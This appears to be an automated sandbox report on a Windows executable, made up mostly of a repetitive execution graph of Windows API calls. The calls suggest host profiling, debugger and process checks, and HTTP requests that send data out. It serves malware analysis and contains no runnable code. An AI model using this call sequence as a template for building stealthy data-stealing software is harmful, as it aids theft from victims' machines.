                                                                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                                                                        File size:25'088 bytes
                                                                                                                                                                                        MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:4.7%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:4.6%
                                                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                                                          Total number of Limit Nodes:30
73296 3058d lstrcpyA 73294->73296 73297 374f8 73296->73297 73301 30609 3 API calls 73297->73301 73303 37513 73301->73303 73305 3058d lstrcpyA 73303->73305 73307 3751c 73305->73307 73315 30609 3 API calls 73307->73315 73319 37537 73315->73319 73323 3058d lstrcpyA 73319->73323 73328 37540 73323->73328 73339 30609 3 API calls 73328->73339 73340 3755b 73339->73340 73344 3058d lstrcpyA 73340->73344 73348 37564 73344->73348 74149 3257f 73348->74149 73368 3cc6c 10 API calls 73368->73373 74158 31c4a 73373->74158 73557 22b7c 73556->73557 73558 2480f 73556->73558 73557->72982 73559 24818 lstrlenA 73558->73559 73559->73557 73559->73559 73560->73062 73562 21385 73561->73562 73562->73087 73571 30c53 GetProcessHeap HeapAlloc GetUserNameA 73562->73571 73564 3d020 IsDebuggerPresent 73563->73564 73565 3d01e 73563->73565 73572 3d975 73564->73572 73565->73091 73568 3d460 SetUnhandledExceptionFilter UnhandledExceptionFilter 73569 3d485 GetCurrentProcess TerminateProcess 73568->73569 73570 3d47d __call_reportfault 73568->73570 73569->73091 73570->73569 73571->73092 73572->73568 73576 214e9 73573->73576 73574 214d9 lstrcmpiW 73575 214ef 73574->73575 73574->73576 73575->73099 73575->73118 73576->73574 73576->73575 73578 304f2 73577->73578 73579 30513 73578->73579 73580 30509 lstrcpyA 73578->73580 73581 30c53 GetProcessHeap HeapAlloc GetUserNameA 73579->73581 73580->73579 73581->73136 73584 30630 73582->73584 73583 30656 73583->73139 73584->73583 73585 30643 lstrcpyA lstrcatA 73584->73585 73585->73583 73587 3059c 73586->73587 73588 305c3 73587->73588 73589 305bb lstrcpyA 73587->73589 73588->73144 73589->73588 73592 3055e 73590->73592 73591 30587 73591->73152 73592->73591 73593 3057d lstrcpyA 73592->73593 73593->73591 73595 247e8 3 API calls 73594->73595 73596 22f27 73595->73596 73597 247e8 3 API calls 73596->73597 73598 22f3e 73597->73598 73599 247e8 3 API calls 73598->73599 73600 22f55 73599->73600 73601 247e8 3 API calls 73600->73601 73602 22f6c 73601->73602 73603 247e8 3 API calls 
73602->73603 73604 22f85 73603->73604 73605 247e8 3 API calls 73604->73605 73606 22f9c 73605->73606 73607 247e8 3 API calls 73606->73607 73608 22fb3 73607->73608 73609 247e8 3 API calls 73608->73609 73610 22fca 73609->73610 73611 247e8 3 API calls 73610->73611 73612 22fe4 73611->73612 73613 247e8 3 API calls 73612->73613 73614 22ffb 73613->73614 73615 247e8 3 API calls 73614->73615 73616 23011 73615->73616 73617 247e8 3 API calls 73616->73617 73618 23028 73617->73618 73619 247e8 3 API calls 73618->73619 73620 2303f 73619->73620 73621 247e8 3 API calls 73620->73621 73622 23056 73621->73622 73623 247e8 3 API calls 73622->73623 73624 2306d 73623->73624 73625 247e8 3 API calls 73624->73625 73626 23084 73625->73626 73627 247e8 3 API calls 73626->73627 73628 2309b 73627->73628 73629 247e8 3 API calls 73628->73629 73630 230b2 73629->73630 73631 247e8 3 API calls 73630->73631 73632 230c9 73631->73632 73633 247e8 3 API calls 73632->73633 73634 230df 73633->73634 73635 247e8 3 API calls 73634->73635 73636 230f6 73635->73636 73637 247e8 3 API calls 73636->73637 73638 2310f 73637->73638 73639 247e8 3 API calls 73638->73639 73640 23123 73639->73640 73641 247e8 3 API calls 73640->73641 73642 2313a 73641->73642 73643 247e8 3 API calls 73642->73643 73644 23154 73643->73644 73645 247e8 3 API calls 73644->73645 73646 2316b 73645->73646 73647 247e8 3 API calls 73646->73647 73648 23182 73647->73648 73649 247e8 3 API calls 73648->73649 73650 23199 73649->73650 73651 247e8 3 API calls 73650->73651 73652 231af 73651->73652 73653 247e8 3 API calls 73652->73653 73654 231c5 73653->73654 73655 247e8 3 API calls 73654->73655 73656 231dc 73655->73656 73657 247e8 3 API calls 73656->73657 73658 231f2 73657->73658 73659 247e8 3 API calls 73658->73659 73660 2320c 73659->73660 73661 247e8 3 API calls 73660->73661 73662 23223 73661->73662 73663 247e8 3 API calls 73662->73663 73664 2323a 73663->73664 73665 247e8 3 API calls 73664->73665 73666 23250 73665->73666 73667 247e8 3 API calls 73666->73667 
73668 23267 73667->73668 73669 247e8 3 API calls 73668->73669 73670 2327e 73669->73670 73671 247e8 3 API calls 73670->73671 73672 23295 73671->73672 73673 247e8 3 API calls 73672->73673 73674 232ab 73673->73674 73675 247e8 3 API calls 73674->73675 73676 232c2 73675->73676 73677 247e8 3 API calls 73676->73677 73678 232d9 73677->73678 73679 247e8 3 API calls 73678->73679 73680 232f0 73679->73680 73681 247e8 3 API calls 73680->73681 73682 23306 73681->73682 73683 247e8 3 API calls 73682->73683 73684 2331c 73683->73684 73685 247e8 3 API calls 73684->73685 73686 23333 73685->73686 73687 247e8 3 API calls 73686->73687 73688 23349 73687->73688 73689 247e8 3 API calls 73688->73689 73690 2335d 73689->73690 73691 247e8 3 API calls 73690->73691 73692 23374 73691->73692 73693 247e8 3 API calls 73692->73693 73694 2338a 73693->73694 73695 247e8 3 API calls 73694->73695 73696 233a1 73695->73696 73697 247e8 3 API calls 73696->73697 73698 233b8 73697->73698 73699 247e8 3 API calls 73698->73699 73700 233cf 73699->73700 73701 247e8 3 API calls 73700->73701 73702 233e6 73701->73702 73703 247e8 3 API calls 73702->73703 73704 233fd 73703->73704 73705 247e8 3 API calls 73704->73705 73706 23414 73705->73706 73707 247e8 3 API calls 73706->73707 73708 2342e 73707->73708 73709 247e8 3 API calls 73708->73709 73710 23445 73709->73710 73711 247e8 3 API calls 73710->73711 73712 2345c 73711->73712 73713 247e8 3 API calls 73712->73713 73714 23473 73713->73714 73715 247e8 3 API calls 73714->73715 73716 2348a 73715->73716 73717 247e8 3 API calls 73716->73717 73718 234a1 73717->73718 73719 247e8 3 API calls 73718->73719 73720 234b8 73719->73720 73721 247e8 3 API calls 73720->73721 73722 234cf 73721->73722 73723 247e8 3 API calls 73722->73723 73724 234e9 73723->73724 73725 247e8 3 API calls 73724->73725 73726 23500 73725->73726 73727 247e8 3 API calls 73726->73727 73728 23517 73727->73728 73729 247e8 3 API calls 73728->73729 73730 2352e 73729->73730 73731 247e8 3 API calls 73730->73731 73732 23545 
73731->73732 73733 247e8 3 API calls 73732->73733 73734 2355c 73733->73734 73735 247e8 3 API calls 73734->73735 73736 23573 73735->73736 73737 247e8 3 API calls 73736->73737 73738 2358a 73737->73738 73739 247e8 3 API calls 73738->73739 73740 235a4 73739->73740 73741 247e8 3 API calls 73740->73741 73742 235bb 73741->73742 73743 247e8 3 API calls 73742->73743 73744 235d2 73743->73744 73745 247e8 3 API calls 73744->73745 73746 235e9 73745->73746 73747 247e8 3 API calls 73746->73747 73748 23600 73747->73748 73749 247e8 3 API calls 73748->73749 73750 23617 73749->73750 73751 247e8 3 API calls 73750->73751 73752 2362d 73751->73752 73753 247e8 3 API calls 73752->73753 73754 23643 73753->73754 73755 247e8 3 API calls 73754->73755 73756 2365d 73755->73756 73757 247e8 3 API calls 73756->73757 73758 23674 73757->73758 73759 247e8 3 API calls 73758->73759 73760 2368b 73759->73760 73761 247e8 3 API calls 73760->73761 73762 236a1 73761->73762 73763 247e8 3 API calls 73762->73763 73764 236b8 73763->73764 73765 247e8 3 API calls 73764->73765 73766 236cf 73765->73766 73767 247e8 3 API calls 73766->73767 73768 236e3 73767->73768 73769 247e8 3 API calls 73768->73769 73770 236f9 73769->73770 73771 247e8 3 API calls 73770->73771 73772 23713 73771->73772 73773 247e8 3 API calls 73772->73773 73774 2372a 73773->73774 73775 247e8 3 API calls 73774->73775 73776 23741 73775->73776 73777 247e8 3 API calls 73776->73777 73778 23758 73777->73778 73779 247e8 3 API calls 73778->73779 73780 2376f 73779->73780 73781 247e8 3 API calls 73780->73781 73782 23786 73781->73782 73783 247e8 3 API calls 73782->73783 73784 2379a 73783->73784 73785 247e8 3 API calls 73784->73785 73786 237b1 73785->73786 73787 247e8 3 API calls 73786->73787 73788 237cb 73787->73788 73789 247e8 3 API calls 73788->73789 73790 237e2 73789->73790 73791 247e8 3 API calls 73790->73791 73792 237f6 73791->73792 73793 247e8 3 API calls 73792->73793 73794 2380a 73793->73794 73795 247e8 3 API calls 73794->73795 73796 23821 73795->73796 
73797 247e8 3 API calls 73796->73797 73798 23838 73797->73798 73799 247e8 3 API calls 73798->73799 73800 2384f 73799->73800 73801 247e8 3 API calls 73800->73801 73802 23866 73801->73802 73803 247e8 3 API calls 73802->73803 73804 23880 73803->73804 73805 247e8 3 API calls 73804->73805 73806 23897 73805->73806 73807 247e8 3 API calls 73806->73807 73808 238ae 73807->73808 73809 247e8 3 API calls 73808->73809 73810 238c5 73809->73810 73811 247e8 3 API calls 73810->73811 73812 238db 73811->73812 73813 247e8 3 API calls 73812->73813 73814 238f2 73813->73814 73815 247e8 3 API calls 73814->73815 73816 23906 73815->73816 73817 247e8 3 API calls 73816->73817 73818 2391d 73817->73818 73819 247e8 3 API calls 73818->73819 73820 23937 73819->73820 73821 247e8 3 API calls 73820->73821 73822 2394e 73821->73822 73823 247e8 3 API calls 73822->73823 73824 23965 73823->73824 73825 247e8 3 API calls 73824->73825 73826 2397c 73825->73826 73827 247e8 3 API calls 73826->73827 73828 23993 73827->73828 73829 247e8 3 API calls 73828->73829 73830 239aa 73829->73830 73831 247e8 3 API calls 73830->73831 73832 239c1 73831->73832 73833 247e8 3 API calls 73832->73833 73834 239d8 73833->73834 73835 247e8 3 API calls 73834->73835 73836 239f2 73835->73836 73837 247e8 3 API calls 73836->73837 73838 23a09 73837->73838 73839 247e8 3 API calls 73838->73839 73840 23a20 73839->73840 73841 247e8 3 API calls 73840->73841 73842 23a37 73841->73842 73843 247e8 3 API calls 73842->73843 73844 23a4e 73843->73844 73845 247e8 3 API calls 73844->73845 73846 23a65 73845->73846 73847 247e8 3 API calls 73846->73847 73848 23a7c 73847->73848 73849 247e8 3 API calls 73848->73849 73850 23a90 73849->73850 73851 247e8 3 API calls 73850->73851 73852 23aaa 73851->73852 73853 247e8 3 API calls 73852->73853 73854 23ac1 73853->73854 73855 247e8 3 API calls 73854->73855 73856 23ad7 73855->73856 73857 247e8 3 API calls 73856->73857 73858 23aee 73857->73858 73859 247e8 3 API calls 73858->73859 73860 23b05 73859->73860 73861 247e8 3 
API calls 73860->73861 73862 23b1c 73861->73862 73863 247e8 3 API calls 73862->73863 73864 23b33 73863->73864 73865 247e8 3 API calls 73864->73865 73866 23b4a 73865->73866 73867 247e8 3 API calls 73866->73867 73868 23b61 73867->73868 73869 247e8 3 API calls 73868->73869 73870 23b75 73869->73870 73871 247e8 3 API calls 73870->73871 73872 23b8c 73871->73872 73873 247e8 3 API calls 73872->73873 73874 23ba3 73873->73874 73875 247e8 3 API calls 73874->73875 73876 23bba 73875->73876 73877 247e8 3 API calls 73876->73877 73878 23bd1 73877->73878 73879 247e8 3 API calls 73878->73879 73880 23be8 73879->73880 73881 247e8 3 API calls 73880->73881 73882 23bff 73881->73882 73883 247e8 3 API calls 73882->73883 73884 23c19 73883->73884 73885 247e8 3 API calls 73884->73885 73886 23c30 73885->73886 73887 247e8 3 API calls 73886->73887 73888 23c47 73887->73888 73889 247e8 3 API calls 73888->73889 73890 23c5e 73889->73890 73891 247e8 3 API calls 73890->73891 73892 23c75 73891->73892 73893 247e8 3 API calls 73892->73893 73894 23c8c 73893->73894 73895 247e8 3 API calls 73894->73895 73896 23ca3 73895->73896 73897 247e8 3 API calls 73896->73897 73898 23cb7 73897->73898 73899 247e8 3 API calls 73898->73899 73900 23cd1 73899->73900 73901 247e8 3 API calls 73900->73901 73902 23ce8 73901->73902 73903 247e8 3 API calls 73902->73903 73904 23cff 73903->73904 73905 247e8 3 API calls 73904->73905 73906 23d16 73905->73906 73907 247e8 3 API calls 73906->73907 73908 23d2c 73907->73908 73909 247e8 3 API calls 73908->73909 73910 23d43 73909->73910 73911 247e8 3 API calls 73910->73911 73912 23d57 73911->73912 73913 247e8 3 API calls 73912->73913 73914 23d6e 73913->73914 73915 247e8 3 API calls 73914->73915 73916 23d85 73915->73916 73917 247e8 3 API calls 73916->73917 73918 23d9c 73917->73918 73919 247e8 3 API calls 73918->73919 73920 23db3 73919->73920 73921 247e8 3 API calls 73920->73921 73922 23dca 73921->73922 73923 247e8 3 API calls 73922->73923 73924 23de1 73923->73924 73925 247e8 3 API calls 
73924->73925 73926 23df8 73925->73926 73927 247e8 3 API calls 73926->73927 73928 23e0f 73927->73928 73929 247e8 3 API calls 73928->73929 73930 23e26 73929->73930 73931 247e8 3 API calls 73930->73931 73932 23e40 73931->73932 73933 247e8 3 API calls 73932->73933 73934 23e57 73933->73934 73935 247e8 3 API calls 73934->73935 73936 23e6e 73935->73936 73937 247e8 3 API calls 73936->73937 73938 23e84 73937->73938 73939 247e8 3 API calls 73938->73939 73940 23e9b 73939->73940 73941 247e8 3 API calls 73940->73941 73942 23eb2 73941->73942 73943 247e8 3 API calls 73942->73943 73944 23ec9 73943->73944 73945 247e8 3 API calls 73944->73945 73946 23ee0 73945->73946 73947 247e8 3 API calls 73946->73947 73948 23efa 73947->73948 73949 247e8 3 API calls 73948->73949 73950 23f10 73949->73950 73951 247e8 3 API calls 73950->73951 73952 23f27 73951->73952 73953 247e8 3 API calls 73952->73953 73954 23f3e 73953->73954 73955 247e8 3 API calls 73954->73955 73956 23f55 73955->73956 73957 247e8 3 API calls 73956->73957 73958 23f6c 73957->73958 73959 247e8 3 API calls 73958->73959 73960 23f80 73959->73960 73961 247e8 3 API calls 73960->73961 73962 23f97 73961->73962 73963 247e8 3 API calls 73962->73963 73964 23fb1 73963->73964 73965 247e8 3 API calls 73964->73965 73966 23fc7 73965->73966 73967 247e8 3 API calls 73966->73967 73968 23fde 73967->73968 73969 247e8 3 API calls 73968->73969 73970 23ff2 73969->73970 73971 247e8 3 API calls 73970->73971 73972 24009 73971->73972 73973 247e8 3 API calls 73972->73973 73974 24020 73973->73974 73975 247e8 3 API calls 73974->73975 73976 24037 73975->73976 73977 247e8 3 API calls 73976->73977 73978 2404e 73977->73978 73979 247e8 3 API calls 73978->73979 73980 24067 73979->73980 73981 247e8 3 API calls 73980->73981 73982 2407e 73981->73982 73983 247e8 3 API calls 73982->73983 73984 24094 73983->73984 73985 247e8 3 API calls 73984->73985 73986 240a8 73985->73986 73987 247e8 3 API calls 73986->73987 73988 240bf 73987->73988 73989 247e8 3 API calls 73988->73989 
73990 240d6 73989->73990 73991 247e8 3 API calls 73990->73991 73992 240ed 73991->73992 73993 247e8 3 API calls 73992->73993 73994 24104 73993->73994 73995 247e8 3 API calls 73994->73995 73996 2411e 73995->73996 73997 247e8 3 API calls 73996->73997 73998 24135 73997->73998 73999 247e8 3 API calls 73998->73999 74000 2414c 73999->74000 74001 247e8 3 API calls 74000->74001 74002 24163 74001->74002 74003 247e8 3 API calls 74002->74003 74004 24179 74003->74004 74005 247e8 3 API calls 74004->74005 74006 2418d 74005->74006 74007 247e8 3 API calls 74006->74007 74008 241a1 74007->74008 74009 247e8 3 API calls 74008->74009 74010 241b8 74009->74010 74011 247e8 3 API calls 74010->74011 74012 241d2 74011->74012 74013 247e8 3 API calls 74012->74013 74014 241e8 74013->74014 74015 247e8 3 API calls 74014->74015 74016 241ff 74015->74016 74017 247e8 3 API calls 74016->74017 74018 24216 74017->74018 74019 247e8 3 API calls 74018->74019 74020 2422d 74019->74020 74021 247e8 3 API calls 74020->74021 74022 24244 74021->74022 74023 247e8 3 API calls 74022->74023 74024 24258 74023->74024 74025 247e8 3 API calls 74024->74025 74026 2426e 74025->74026 74027 247e8 3 API calls 74026->74027 74028 24288 74027->74028 74029 247e8 3 API calls 74028->74029 74030 2429f 74029->74030 74031 247e8 3 API calls 74030->74031 74032 242b6 74031->74032 74033 247e8 3 API calls 74032->74033 74034 242cc 74033->74034 74035 247e8 3 API calls 74034->74035 74036 242e3 74035->74036 74037 247e8 3 API calls 74036->74037 74038 242fa 74037->74038 74039 247e8 3 API calls 74038->74039 74040 24311 74039->74040 74041 247e8 3 API calls 74040->74041 74042 24325 74041->74042 74043 247e8 3 API calls 74042->74043 74044 2433c 74043->74044 74045 247e8 3 API calls 74044->74045 74046 24353 74045->74046 74047 247e8 3 API calls 74046->74047 74048 2436a 74047->74048 74049 247e8 3 API calls 74048->74049 74050 24381 74049->74050 74051 247e8 3 API calls 74050->74051 74052 24395 74051->74052 74053 247e8 3 API calls 74052->74053 74054 243ac 
74053->74054 74055 247e8 3 API calls 74054->74055 74056 243c3 74055->74056 74057 247e8 3 API calls 74056->74057 74058 243da 74057->74058 74059 247e8 3 API calls 74058->74059 74060 243f1 74059->74060 74061 247e8 3 API calls 74060->74061 74062 24408 74061->74062 74063 247e8 3 API calls 74062->74063 74064 2441c 74063->74064 74065 247e8 3 API calls 74064->74065 74066 24433 74065->74066 74067 247e8 3 API calls 74066->74067 74068 2444a 74067->74068 74069 247e8 3 API calls 74068->74069 74070 2445e 74069->74070 74071 247e8 3 API calls 74070->74071 74072 24472 74071->74072 74073 247e8 3 API calls 74072->74073 74074 24486 74073->74074 74075 247e8 3 API calls 74074->74075 74076 244a0 74075->74076 74077 247e8 3 API calls 74076->74077 74078 244b7 74077->74078 74079 247e8 3 API calls 74078->74079 74080 244cd 74079->74080 74081 247e8 3 API calls 74080->74081 74082 244e4 74081->74082 74083 247e8 3 API calls 74082->74083 74084 244fa 74083->74084 74085 247e8 3 API calls 74084->74085 74086 24511 74085->74086 74087 247e8 3 API calls 74086->74087 74088 24528 74087->74088 74089 247e8 3 API calls 74088->74089 74090 2453e 74089->74090 74091 247e8 3 API calls 74090->74091 74092 24558 74091->74092 74093 247e8 3 API calls 74092->74093 74094 2456f 74093->74094 74095 247e8 3 API calls 74094->74095 74096 24586 74095->74096 74097 247e8 3 API calls 74096->74097 74098 2459d 74097->74098 74099 247e8 3 API calls 74098->74099 74100 245b4 74099->74100 74101 247e8 3 API calls 74100->74101 74102 245cb 74101->74102 74103 247e8 3 API calls 74102->74103 74104 245e2 74103->74104 74105 247e8 3 API calls 74104->74105 74106 245f9 74105->74106 74107 247e8 3 API calls 74106->74107 74108 24612 74107->74108 74109 247e8 3 API calls 74108->74109 74110 24629 74109->74110 74111 247e8 3 API calls 74110->74111 74112 24642 74111->74112 74113 247e8 3 API calls 74112->74113 74114 24656 74113->74114 74115 247e8 3 API calls 74114->74115 74116 2466d 74115->74116 74117 247e8 3 API calls 74116->74117 74118 24684 74117->74118 
74119 247e8 3 API calls 74118->74119 74120 2469b 74119->74120 74121 247e8 3 API calls 74120->74121 74122 246b2 74121->74122 74123 247e8 3 API calls 74122->74123 74124 246cc 74123->74124 74125 247e8 3 API calls 74124->74125 74126 246e3 74125->74126 74127 247e8 3 API calls 74126->74127 74128 246f9 74127->74128 74129 247e8 3 API calls 74128->74129 74130 24710 74129->74130 74131 247e8 3 API calls 74130->74131 74132 24727 74131->74132 74133 247e8 3 API calls 74132->74133 74134 2473d 74133->74134 74135 247e8 3 API calls 74134->74135 74136 24754 74135->74136 74137 247e8 3 API calls 74136->74137 74138 24768 74137->74138 74139 247e8 3 API calls 74138->74139 74140 24781 74139->74140 74141 247e8 3 API calls 74140->74141 74142 24797 74141->74142 74143 247e8 3 API calls 74142->74143 74144 247ae 74143->74144 74145 247e8 3 API calls 74144->74145 74146 247c5 74145->74146 74147 247e8 3 API calls 74146->74147 74148 247dc 74147->74148 74148->73156 75463 4f109 74149->75463 74151 3258e CreateToolhelp32Snapshot Process32First 74152 325c2 Process32Next 74151->74152 74153 325ef CloseHandle 74151->74153 74152->74153 74154 325d4 StrCmpCA 74152->74154 75464 4f165 74153->75464 74154->74152 74156 325e6 74154->74156 74156->74152 74159 304e7 lstrcpyA 74158->74159 74160 31c67 74159->74160 74161 304e7 lstrcpyA 74160->74161 74162 31c75 GetSystemTime 74161->74162 74163 31c91 74162->74163 74164 3d016 __crtGetStringTypeA_stat 5 API calls 74163->74164 74165 31cc8 74164->74165 74165->73163 74168 305e1 74166->74168 74167 30605 74167->73178 74168->74167 74169 305f3 lstrcpyA lstrcatA 74168->74169 74169->74167 74171 30519 lstrcpyA 74170->74171 74172 21d07 74171->74172 74173 30519 lstrcpyA 74172->74173 74174 21d12 74173->74174 74175 30519 lstrcpyA 74174->74175 74176 21d1d 74175->74176 74177 30519 lstrcpyA 74176->74177 74178 21d34 74177->74178 74179 369b6 74178->74179 74180 30549 2 API calls 74179->74180 74181 369ec 74180->74181 74182 30549 2 API calls 74181->74182 74183 369f9 74182->74183 74184 30549 2 API 
calls 74183->74184 74185 36a06 74184->74185 74186 304e7 lstrcpyA 74185->74186 74187 36a13 74186->74187 74188 304e7 lstrcpyA 74187->74188 74189 36a20 74188->74189 74190 304e7 lstrcpyA 74189->74190 74191 36a2d 74190->74191 74192 304e7 lstrcpyA 74191->74192 74193 36a3a 74192->74193 74194 304e7 lstrcpyA 74193->74194 74195 36a47 74194->74195 74196 304e7 lstrcpyA 74195->74196 74220 36a54 74196->74220 74199 21cfd lstrcpyA 74199->74220 74200 36a98 StrCmpCA 74201 36af1 StrCmpCA 74200->74201 74200->74220 74202 36cd4 74201->74202 74201->74220 74205 3058d lstrcpyA 74202->74205 74206 36cdf 74205->74206 74209 304e7 lstrcpyA 74206->74209 74207 30519 lstrcpyA 74207->74220 74210 36cec 74209->74210 74211 3058d lstrcpyA 74210->74211 74214 36c2c 74211->74214 74212 3683e 28 API calls 74212->74220 74213 368c6 33 API calls 74213->74220 74215 304e7 lstrcpyA 74214->74215 74216 36d0b 74215->74216 74218 3058d lstrcpyA 74216->74218 74217 36b51 StrCmpCA 74217->74220 74221 36baa StrCmpCA 74217->74221 74219 36d15 74218->74219 75476 36da2 74219->75476 74220->74199 74220->74200 74220->74201 74220->74207 74220->74212 74220->74213 74220->74217 74220->74221 74252 3058d lstrcpyA 74220->74252 75467 229f8 74220->75467 75470 22a09 74220->75470 75473 22a1a 74220->75473 75483 22a2b lstrcpyA 74220->75483 75484 22a3c lstrcpyA 74220->75484 75485 22a4d lstrcpyA 74220->75485 74222 36ca3 74221->74222 74223 36bc0 StrCmpCA 74221->74223 74225 3058d lstrcpyA 74222->74225 74226 36c72 74223->74226 74227 36bd6 StrCmpCA 74223->74227 74230 36cae 74225->74230 74228 3058d lstrcpyA 74226->74228 74231 36be8 StrCmpCA 74227->74231 74232 36c3e 74227->74232 74233 36c7d 74228->74233 74235 304e7 lstrcpyA 74230->74235 74236 36c0a 74231->74236 74237 36bfa Sleep 74231->74237 74234 3058d lstrcpyA 74232->74234 74239 304e7 lstrcpyA 74233->74239 74240 36c49 74234->74240 74241 36cbb 74235->74241 74238 3058d lstrcpyA 74236->74238 74237->74220 74242 36c15 74238->74242 74243 36c8a 74239->74243 74244 304e7 lstrcpyA 74240->74244 74245 3058d 
lstrcpyA 74241->74245 74246 304e7 lstrcpyA 74242->74246 74247 3058d lstrcpyA 74243->74247 74248 36c56 74244->74248 74245->74214 74249 36c22 74246->74249 74247->74214 74250 3058d lstrcpyA 74248->74250 74251 3058d lstrcpyA 74249->74251 74250->74214 74251->74214 74252->74220 74253 36d28 74253->73189 74255 3058d lstrcpyA 74254->74255 74256 38257 74255->74256 74257 3058d lstrcpyA 74256->74257 74258 38262 74257->74258 74259 3058d lstrcpyA 74258->74259 74260 3826d 74259->74260 74260->73193 74262 30529 74261->74262 74263 3053e 74262->74263 74264 30536 lstrcpyA 74262->74264 74263->73206 74264->74263 74266 309e6 GetVolumeInformationA 74265->74266 74267 309df 74265->74267 74268 30a4d 74266->74268 74267->74266 74268->74268 74269 30a62 GetProcessHeap HeapAlloc 74268->74269 74270 30a7d 74269->74270 74271 30a8c wsprintfA lstrcatA 74269->74271 74273 304e7 lstrcpyA 74270->74273 75486 31684 GetCurrentHwProfileA 74271->75486 74274 30a85 74273->74274 74278 3d016 __crtGetStringTypeA_stat 5 API calls 74274->74278 74275 30ac7 lstrlenA 75502 323d5 lstrcpyA malloc strncpy 74275->75502 74277 30aea lstrcatA 74280 30b01 74277->74280 74279 30b2e 74278->74279 74279->73233 74281 304e7 lstrcpyA 74280->74281 74282 30b18 74281->74282 74282->74274 74284 30519 lstrcpyA 74283->74284 74285 24b59 74284->74285 75506 24ab6 74285->75506 74287 24b65 74288 304e7 lstrcpyA 74287->74288 74289 24b81 74288->74289 74290 304e7 lstrcpyA 74289->74290 74291 24b91 74290->74291 74292 304e7 lstrcpyA 74291->74292 74293 24ba1 74292->74293 74294 304e7 lstrcpyA 74293->74294 74295 24bb1 74294->74295 74296 304e7 lstrcpyA 74295->74296 74297 24bc1 InternetOpenA StrCmpCA 74296->74297 74298 24bf5 74297->74298 74299 25194 InternetCloseHandle 74298->74299 74300 31c4a 7 API calls 74298->74300 74310 251e1 74299->74310 74301 24c15 74300->74301 74302 305c7 2 API calls 74301->74302 74303 24c28 74302->74303 74304 3058d lstrcpyA 74303->74304 74305 24c33 74304->74305 74306 30609 3 API calls 74305->74306 74307 24c5f 74306->74307 74308 3058d 
lstrcpyA 74307->74308 74309 24c6a 74308->74309 74312 30609 3 API calls 74309->74312 74311 3d016 __crtGetStringTypeA_stat 5 API calls 74310->74311 74313 25235 74311->74313 74314 24c8b 74312->74314 74416 339c2 StrCmpCA 74313->74416 74315 3058d lstrcpyA 74314->74315 74316 24c96 74315->74316 74317 305c7 2 API calls 74316->74317 74318 24cb8 74317->74318 74319 3058d lstrcpyA 74318->74319 74320 24cc3 74319->74320 74321 30609 3 API calls 74320->74321 74322 24ce4 74321->74322 74323 3058d lstrcpyA 74322->74323 74324 24cef 74323->74324 74325 30609 3 API calls 74324->74325 74326 24d10 74325->74326 74327 3058d lstrcpyA 74326->74327 74328 24d1b 74327->74328 74329 30609 3 API calls 74328->74329 74330 24d3d 74329->74330 74331 305c7 2 API calls 74330->74331 74332 24d48 74331->74332 74333 3058d lstrcpyA 74332->74333 74334 24d53 74333->74334 74335 24d69 InternetConnectA 74334->74335 74335->74299 74336 24d97 HttpOpenRequestA 74335->74336 74337 24dd7 74336->74337 74338 25188 InternetCloseHandle 74336->74338 74339 24dfb 74337->74339 74340 24ddf InternetSetOptionA 74337->74340 74338->74299 74341 30609 3 API calls 74339->74341 74340->74339 74342 24e11 74341->74342 74343 3058d lstrcpyA 74342->74343 74344 24e1c 74343->74344 74345 305c7 2 API calls 74344->74345 74346 24e3e 74345->74346 74347 3058d lstrcpyA 74346->74347 74348 24e49 74347->74348 74349 30609 3 API calls 74348->74349 74350 24e6a 74349->74350 74351 3058d lstrcpyA 74350->74351 74352 24e75 74351->74352 74353 30609 3 API calls 74352->74353 74354 24e97 74353->74354 74355 3058d lstrcpyA 74354->74355 74356 24ea2 74355->74356 74357 30609 3 API calls 74356->74357 74358 24ec3 74357->74358 74359 3058d lstrcpyA 74358->74359 74360 24ece 74359->74360 74361 30609 3 API calls 74360->74361 74362 24eef 74361->74362 74363 3058d lstrcpyA 74362->74363 74364 24efa 74363->74364 74365 305c7 2 API calls 74364->74365 74366 24f19 74365->74366 74367 3058d lstrcpyA 74366->74367 74368 24f24 74367->74368 74369 30609 3 API calls 74368->74369 74370 24f45 
74369->74370 74371 3058d lstrcpyA 74370->74371 74372 24f50 74371->74372 74373 30609 3 API calls 74372->74373 74374 24f71 74373->74374 74375 3058d lstrcpyA 74374->74375 74376 24f7c 74375->74376 74377 305c7 2 API calls 74376->74377 74378 24f9e 74377->74378 74379 3058d lstrcpyA 74378->74379 74380 24fa9 74379->74380 74381 30609 3 API calls 74380->74381 74382 24fca 74381->74382 74383 3058d lstrcpyA 74382->74383 74384 24fd5 74383->74384 74385 30609 3 API calls 74384->74385 74386 24ff7 74385->74386 74387 3058d lstrcpyA 74386->74387 74388 25002 74387->74388 74389 30609 3 API calls 74388->74389 74390 25023 74389->74390 74391 3058d lstrcpyA 74390->74391 74392 2502e 74391->74392 74393 30609 3 API calls 74392->74393 74394 2504f 74393->74394 74395 3058d lstrcpyA 74394->74395 74396 2505a 74395->74396 74397 305c7 2 API calls 74396->74397 74398 25079 74397->74398 74399 3058d lstrcpyA 74398->74399 74400 25084 74399->74400 74401 304e7 lstrcpyA 74400->74401 74402 2509f 74401->74402 74403 305c7 2 API calls 74402->74403 74404 250b6 74403->74404 74405 305c7 2 API calls 74404->74405 74406 250c7 74405->74406 74407 3058d lstrcpyA 74406->74407 74408 250d2 74407->74408 74409 250e8 lstrlenA lstrlenA HttpSendRequestA 74408->74409 74410 2515c InternetReadFile 74409->74410 74411 25176 InternetCloseHandle 74410->74411 74414 2511c 74410->74414 74412 22920 74411->74412 74412->74338 74413 30609 3 API calls 74413->74414 74414->74410 74414->74411 74414->74413 74415 3058d lstrcpyA 74414->74415 74415->74414 74417 339e1 ExitProcess 74416->74417 74418 339e8 strtok_s 74416->74418 74419 33b48 74418->74419 74432 33a04 74418->74432 74419->73241 74420 33b2a strtok_s 74420->74419 74420->74432 74421 33a21 StrCmpCA 74421->74420 74421->74432 74422 33b16 StrCmpCA 74422->74420 74423 33a75 StrCmpCA 74423->74420 74423->74432 74424 33ab4 StrCmpCA 74424->74420 74424->74432 74425 33af4 StrCmpCA 74425->74420 74426 33a59 